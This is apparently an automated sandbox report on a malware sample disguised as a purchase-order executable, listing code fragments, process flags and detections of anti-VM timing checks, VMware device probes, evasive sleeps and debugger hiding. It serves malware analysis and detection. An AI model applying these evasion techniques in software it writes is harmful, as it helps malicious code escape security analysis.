Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004155C6 push edx; ret 9_2_0041568E
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0137D0D1 push ecx; ret 9_2_0137D0E4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0397D0D1 push ecx; ret 17_2_0397D0E4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE52CC push ds; retf 17_2_02EE52DA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE620A pushad ; iretd 17_2_02EE6230
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB3B5 push eax; ret 17_2_02EEB408
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE54BD push fs; iretd 17_2_02EE54DA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB46C push eax; ret 17_2_02EEB472
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB40B push eax; ret 17_2_02EEB472
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB402 push eax; ret 17_2_02EEB408
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE55C6 push edx; ret 17_2_02EE568E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE5569 push edx; ret 17_2_02EE568E
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 0000000002ED85E4 second address: 0000000002ED85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 0000000002ED897E second address: 0000000002ED8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004088B0 rdtsc 9_2_004088B0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6572 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 6996 Thread sleep time: -44000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: explorer.exe, 0000000C.00000000.694685314.000000000A64D000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&~
Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000C.00000000.694504401.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000C.00000000.688629352.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000C.00000000.694504401.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: WerFault.exe, 0000000D.00000002.708068526.0000000004C20000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWT
Source: WerFault.exe, 0000000D.00000002.706779671.00000000011C8000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000C.00000000.678387989.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000C.00000000.695029841.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000C.00000000.695297313.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004088B0 rdtsc 9_2_004088B0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00409B20 LdrLoadDll, 9_2_00409B20
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135513A mov eax, dword ptr fs:[00000030h] 9_2_0135513A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135513A mov eax, dword ptr fs:[00000030h] 9_2_0135513A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120 mov eax, dword ptr fs:[00000030h] 9_2_01344120
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120 mov eax, dword ptr fs:[00000030h] 9_2_01344120
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120 mov eax, dword ptr fs:[00000030h] 9_2_01344120
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120 mov eax, dword ptr fs:[00000030h] 9_2_01344120
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120 mov ecx, dword ptr fs:[00000030h] 9_2_01344120
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329100 mov eax, dword ptr fs:[00000030h] 9_2_01329100
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329100 mov eax, dword ptr fs:[00000030h] 9_2_01329100
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329100 mov eax, dword ptr fs:[00000030h] 9_2_01329100
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132B171 mov eax, dword ptr fs:[00000030h] 9_2_0132B171
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132B171 mov eax, dword ptr fs:[00000030h] 9_2_0132B171
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132C962 mov eax, dword ptr fs:[00000030h] 9_2_0132C962
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134B944 mov eax, dword ptr fs:[00000030h] 9_2_0134B944
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134B944 mov eax, dword ptr fs:[00000030h] 9_2_0134B944
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A51BE mov eax, dword ptr fs:[00000030h] 9_2_013A51BE
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A51BE mov eax, dword ptr fs:[00000030h] 9_2_013A51BE
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A51BE mov eax, dword ptr fs:[00000030h] 9_2_013A51BE
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A51BE mov eax, dword ptr fs:[00000030h] 9_2_013A51BE
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013561A0 mov eax, dword ptr fs:[00000030h] 9_2_013561A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013561A0 mov eax, dword ptr fs:[00000030h] 9_2_013561A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A69A6 mov eax, dword ptr fs:[00000030h] 9_2_013A69A6
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352990 mov eax, dword ptr fs:[00000030h] 9_2_01352990
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135A185 mov eax, dword ptr fs:[00000030h] 9_2_0135A185
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134C182 mov eax, dword ptr fs:[00000030h] 9_2_0134C182
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013B41E8 mov eax, dword ptr fs:[00000030h] 9_2_013B41E8
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0132B1E1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0132B1E1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0132B1E1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135002D mov eax, dword ptr fs:[00000030h] 9_2_0135002D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135002D mov eax, dword ptr fs:[00000030h] 9_2_0135002D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135002D mov eax, dword ptr fs:[00000030h] 9_2_0135002D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135002D mov eax, dword ptr fs:[00000030h] 9_2_0135002D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135002D mov eax, dword ptr fs:[00000030h] 9_2_0135002D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133B02A mov eax, dword ptr fs:[00000030h] 9_2_0133B02A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133B02A mov eax, dword ptr fs:[00000030h] 9_2_0133B02A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133B02A mov eax, dword ptr fs:[00000030h] 9_2_0133B02A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133B02A mov eax, dword ptr fs:[00000030h] 9_2_0133B02A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F4015 mov eax, dword ptr fs:[00000030h] 9_2_013F4015
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F4015 mov eax, dword ptr fs:[00000030h] 9_2_013F4015
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A7016 mov eax, dword ptr fs:[00000030h] 9_2_013A7016
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A7016 mov eax, dword ptr fs:[00000030h] 9_2_013A7016
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A7016 mov eax, dword ptr fs:[00000030h] 9_2_013A7016
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F1074 mov eax, dword ptr fs:[00000030h] 9_2_013F1074
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E2073 mov eax, dword ptr fs:[00000030h] 9_2_013E2073
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01340050 mov eax, dword ptr fs:[00000030h] 9_2_01340050
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01340050 mov eax, dword ptr fs:[00000030h] 9_2_01340050
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135F0BF mov ecx, dword ptr fs:[00000030h] 9_2_0135F0BF
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135F0BF mov eax, dword ptr fs:[00000030h] 9_2_0135F0BF
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135F0BF mov eax, dword ptr fs:[00000030h] 9_2_0135F0BF
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h] 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h] 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h] 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h] 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h] 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013520A0 mov eax, dword ptr fs:[00000030h] 9_2_013520A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013690AF mov eax, dword ptr fs:[00000030h] 9_2_013690AF
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329080 mov eax, dword ptr fs:[00000030h] 9_2_01329080
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A3884 mov eax, dword ptr fs:[00000030h] 9_2_013A3884
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A3884 mov eax, dword ptr fs:[00000030h] 9_2_013A3884
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013258EC mov eax, dword ptr fs:[00000030h] 9_2_013258EC
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h] 9_2_013BB8D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BB8D0 mov ecx, dword ptr fs:[00000030h] 9_2_013BB8D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h] 9_2_013BB8D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h] 9_2_013BB8D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h] 9_2_013BB8D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013BB8D0 mov eax, dword ptr fs:[00000030h] 9_2_013BB8D0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E131B mov eax, dword ptr fs:[00000030h] 9_2_013E131B
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01353B7A mov eax, dword ptr fs:[00000030h] 9_2_01353B7A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01353B7A mov eax, dword ptr fs:[00000030h] 9_2_01353B7A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132DB60 mov ecx, dword ptr fs:[00000030h] 9_2_0132DB60
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F8B58 mov eax, dword ptr fs:[00000030h] 9_2_013F8B58
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132F358 mov eax, dword ptr fs:[00000030h] 9_2_0132F358
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132DB40 mov eax, dword ptr fs:[00000030h] 9_2_0132DB40
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01354BAD mov eax, dword ptr fs:[00000030h] 9_2_01354BAD
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01354BAD mov eax, dword ptr fs:[00000030h] 9_2_01354BAD
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01354BAD mov eax, dword ptr fs:[00000030h] 9_2_01354BAD
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F5BA5 mov eax, dword ptr fs:[00000030h] 9_2_013F5BA5
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352397 mov eax, dword ptr fs:[00000030h] 9_2_01352397
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135B390 mov eax, dword ptr fs:[00000030h] 9_2_0135B390
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013E138A mov eax, dword ptr fs:[00000030h] 9_2_013E138A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01331B8F mov eax, dword ptr fs:[00000030h] 9_2_01331B8F
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01331B8F mov eax, dword ptr fs:[00000030h] 9_2_01331B8F
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013DD380 mov ecx, dword ptr fs:[00000030h] 9_2_013DD380
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h] 9_2_013503E2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h] 9_2_013503E2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h] 9_2_013503E2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h] 9_2_013503E2
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013503E2 mov eax, dword ptr fs:[00000030h] 9_2_013503E2
